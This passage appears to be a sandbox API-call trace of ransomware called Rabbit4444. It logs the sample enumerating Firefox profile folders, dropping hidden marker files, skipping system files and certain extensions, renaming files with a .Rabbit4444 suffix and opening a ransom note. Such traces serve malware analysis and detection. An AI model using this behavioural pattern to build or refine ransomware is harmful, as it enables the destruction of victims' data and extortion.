returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6" [0052.123] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xef950 | out: hHeap=0xe0000) returned 1 [0052.123] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xea708 | out: hHeap=0xe0000) returned 1 [0052.123] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6" [0052.123] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\" [0052.123] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\.BFC0E91B00AE8A0620D3" [0052.124] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.124] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.127] FlushFileBuffers (hFile=0x27c) returned 1 [0052.128] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.128] CloseHandle (hObject=0x27c) returned 1 [0052.128] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6") returned 93 [0052.128] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.128] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40c5e7c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x40e6e0c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe86310e5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0052.129] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.129] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.129] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.129] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.129] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40c5e7c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x40e6e0c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe86310e5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.129] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.129] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.129] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.129] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.129] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.129] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe86310e5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe86310e5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe865730f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.129] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.129] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.129] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40c7227, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xcdbd0100, ftLastAccessTime.dwHighDateTime=0x1d1e9c5, ftLastWriteTime.dwLowDateTime=0xcdbd0100, ftLastWriteTime.dwHighDateTime=0x1d1e9c5, nFileSizeHigh=0x0, nFileSizeLow=0xd81c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gmpopenh264.dll", cAlternateFileName="GMPOPE~1.DLL")) returned 1 [0052.129] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.129] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.129] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="Rabbit4444.exe") returned -1 [0052.129] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2=".") returned 1 [0052.129] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="..") returned 1 [0052.129] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="windows") returned -1 [0052.129] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="bootmgr") returned 1 [0052.129] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="pagefile.sys") returned -1 [0052.129] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="boot") returned 1 [0052.129] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="ids.txt") returned -1 [0052.129] lstrcmpiW (lpString1="gmpopenh264.dll", lpString2="NTUSER.DAT") returned -1 [0052.129] lstrcpyW (in: lpString1=0x130ebf4, lpString2="gmpopenh264.dll" | out: lpString1="gmpopenh264.dll") returned="gmpopenh264.dll" [0052.129] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.dll", dwFileAttributes=0x0) returned 1 [0052.130] lstrlenW (lpString="gmpopenh264.dll") returned 15 [0052.130] lstrlenW (lpString="Rabbit4444") returned 10 [0052.130] lstrcmpiW (lpString1="enh264.dll", lpString2="Rabbit4444") returned -1 [0052.130] lstrlenW (lpString=".dll") returned 4 [0052.130] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0052.130] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40e6e0c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xc7554a80, ftLastAccessTime.dwHighDateTime=0x1d1e848, ftLastWriteTime.dwLowDateTime=0xc7554a80, ftLastWriteTime.dwHighDateTime=0x1d1e848, nFileSizeHigh=0x0, nFileSizeLow=0x74, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gmpopenh264.info", cAlternateFileName="GMPOPE~1.INF")) returned 1 [0052.130] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.130] lstrcmpiW (lpString1="gmpopenh264.info", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.130] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="Rabbit4444.exe") returned -1 [0052.130] lstrcmpiW (lpString1="gmpopenh264.info", lpString2=".") returned 1 [0052.130] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="..") returned 1 [0052.130] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="windows") returned -1 [0052.130] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="bootmgr") returned 1 [0052.130] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="pagefile.sys") returned -1 [0052.130] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="boot") returned 1 [0052.130] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="ids.txt") returned -1 [0052.130] lstrcmpiW (lpString1="gmpopenh264.info", lpString2="NTUSER.DAT") returned -1 [0052.130] lstrcpyW (in: lpString1=0x130ebf4, lpString2="gmpopenh264.info" | out: lpString1="gmpopenh264.info") returned="gmpopenh264.info" [0052.130] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info", dwFileAttributes=0x0) returned 1 [0052.131] lstrlenW (lpString="gmpopenh264.info") returned 16 [0052.131] lstrlenW (lpString="Rabbit4444") returned 10 [0052.131] lstrcmpiW (lpString1="nh264.info", lpString2="Rabbit4444") returned -1 [0052.131] lstrlenW (lpString=".dll") returned 4 [0052.131] lstrcmpiW (lpString1="info", lpString2=".dll") returned 1 [0052.131] lstrlenW (lpString=".lnk") returned 4 [0052.131] lstrcmpiW (lpString1="info", lpString2=".lnk") returned 1 [0052.131] lstrlenW (lpString=".ini") returned 4 [0052.131] lstrcmpiW (lpString1="info", lpString2=".ini") returned 1 [0052.131] lstrlenW (lpString=".sys") returned 4 [0052.131] lstrcmpiW (lpString1="info", lpString2=".sys") returned 1 [0052.131] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.131] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.131] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14344207260) returned 1 [0052.131] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=116) returned 1 [0052.131] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0052.131] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0052.131] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x380, lpName=0x0) returned 0x298 [0052.133] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x380) returned 0x70000 [0052.134] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.134] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0052.134] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.134] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0052.134] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.134] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0052.134] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.134] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0052.134] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14344497737) returned 1 [0052.134] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0052.134] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0052.134] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.134] CloseHandle (hObject=0x298) returned 1 [0052.134] CloseHandle (hObject=0x278) returned 1 [0052.135] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info.Rabbit4444") returned 121 [0052.135] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\gmpopenh264.info.rabbit4444"), dwFlags=0x1) returned 1 [0052.137] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40e6e0c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xc7554a80, ftLastAccessTime.dwHighDateTime=0x1d1e848, ftLastWriteTime.dwLowDateTime=0xc7554a80, ftLastWriteTime.dwHighDateTime=0x1d1e848, nFileSizeHigh=0x0, nFileSizeLow=0x74, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gmpopenh264.info", cAlternateFileName="GMPOPE~1.INF")) returned 0 [0052.137] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0052.137] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.137] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp-gmpopenh264\\1.6\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.137] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.138] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.138] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.138] CloseHandle (hObject=0x278) returned 1 [0052.138] CloseHandle (hObject=0x27c) returned 1 [0052.138] GetCurrentThreadId () returned 0xd98 [0052.138] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6430 [0052.138] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp" [0052.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf11e8 | out: hHeap=0xe0000) returned 1 [0052.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6428 | out: hHeap=0xe0000) returned 1 [0052.138] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp" [0052.138] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\" [0052.138] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\.BFC0E91B00AE8A0620D3" [0052.138] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.140] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.143] FlushFileBuffers (hFile=0x27c) returned 1 [0052.143] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.144] CloseHandle (hObject=0x27c) returned 1 [0052.144] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp") returned 77 [0052.144] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.144] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdbd76e4, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x4079e226, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe865730f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0052.144] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.144] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.144] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.144] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.144] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdbd76e4, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x4079e226, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe865730f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.144] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.144] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.144] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.145] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.145] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.145] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe865730f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe865730f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe867d67d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.145] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.145] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.145] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4079e226, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4079e226, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x4079e226, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WINNT_x86_64-msvc", cAlternateFileName="WINNT_~1")) returned 1 [0052.145] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.145] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.145] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="Rabbit4444.exe") returned 1 [0052.145] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2=".") returned 1 [0052.145] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="..") returned 1 [0052.145] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="windows") returned 1 [0052.145] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="bootmgr") returned 1 [0052.145] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="pagefile.sys") returned 1 [0052.145] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="boot") returned 1 [0052.145] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="ids.txt") returned 1 [0052.145] lstrcmpiW (lpString1="WINNT_x86_64-msvc", lpString2="NTUSER.DAT") returned 1 [0052.145] lstrcpyW (in: lpString1=0x130ebd4, lpString2="WINNT_x86_64-msvc" | out: lpString1="WINNT_x86_64-msvc") returned="WINNT_x86_64-msvc" [0052.145] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xea708 [0052.145] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc0) returned 0xef950 [0052.145] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xea710 | out: ListHead=0xf68b0, ListEntry=0xea710) returned 0xf6410 [0052.145] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4079e226, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4079e226, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x4079e226, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WINNT_x86_64-msvc", cAlternateFileName="WINNT_~1")) returned 0 [0052.145] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0052.145] lstrcpyW (in: lpString1=0x130ebd4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.145] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.147] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.147] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.148] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.148] CloseHandle (hObject=0x278) returned 1 [0052.148] CloseHandle (hObject=0x27c) returned 1 [0052.148] GetCurrentThreadId () returned 0xd98 [0052.148] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xea710 [0052.148] lstrcpynW (in: lpString1=0x130eb38, 